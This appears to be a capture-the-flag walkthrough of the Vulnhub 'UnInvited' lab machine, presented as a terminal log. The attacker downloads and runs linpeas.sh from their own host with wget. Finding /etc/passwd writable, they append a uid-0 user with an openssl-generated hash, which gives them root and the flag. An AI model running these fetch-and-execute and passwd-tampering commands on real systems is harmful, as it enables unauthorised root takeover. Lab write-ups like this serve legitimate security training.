\/ \/ \/ \/
!!!!!!!!!!!!!!!!!!WECOME TO THE PARTY!!!!!!!!!!!!!!!!!!!!!
#########################################################
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
Last login: Fri Jul 31 10:36:15 2020 from 192.168.1.101
docksec@uninvited:~$ id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
docksec@uninvited:~$
docksec@uninvited:/home/jeevan$ cd /tmp
docksec@uninvited:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
--2023-03-04 14:50:16-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=====================================================>] 747.87K --.-KB/s in 0.003s
2023-03-04 14:50:16 (255 MB/s) - ‘linpeas.sh’ saved [765823/765823]
docksec@uninvited:/tmp$ chmod +x linpeas.sh
docksec@uninvited:/tmp$ ./linpeas.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
Create a password hash, then append a line with a new user name, this hash and uid/gid 0 to the writable /etc/passwd.
docksec@uninvited:/tmp$ echo 'jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash' >> /etc/passwd
docksec@uninvited:/tmp$ su - jason
Password:
root@uninvited:~# cd /root
root@uninvited:~# ls -alh
total 44K
drwx------ 6 root root 4.0K Jul 29 2020 .
drwxr-xr-x 23 root root 4.0K Jul 28 2020 ..
-rw------- 1 root root 3.5K Jul 30 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Jul 29 2020 .cache
drwx------ 3 root root 4.0K Jul 29 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Jul 28 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxr-xr-x 3 root root 4.0K Jul 28 2020 ProjectX
-rw-r--r-- 1 root root 376 Jul 28 2020 root.txt
-rw-r--r-- 1 root root 66 Jul 28 2020 .selected_editor
root@uninvited:~# cat root.txt
.__ .__ __ .___
__ __ ____ |__| _______ _|___/ |_ ____ __| _/
| | \/ \| |/ \ \/ | \ ___/ __ \ / __ |
| | | | | | | \ /| || | \ ___// /_/ |
|____/|___| |__|___| /\_/ |__||__| \___ \____ |
\/ \/ \/ \/
FLAG{58DSFJ74RFWESD8J2LKJGHJ87ER4QREWRFLMSTDCMGKAASD}
root@uninvited:~#
Root shell and root flag obtained.
Tags: UnInvited, Vulnhub, kali, http, target machine, root. Source: https://www.cnblogs.com/jason-huawen/p/17178745.html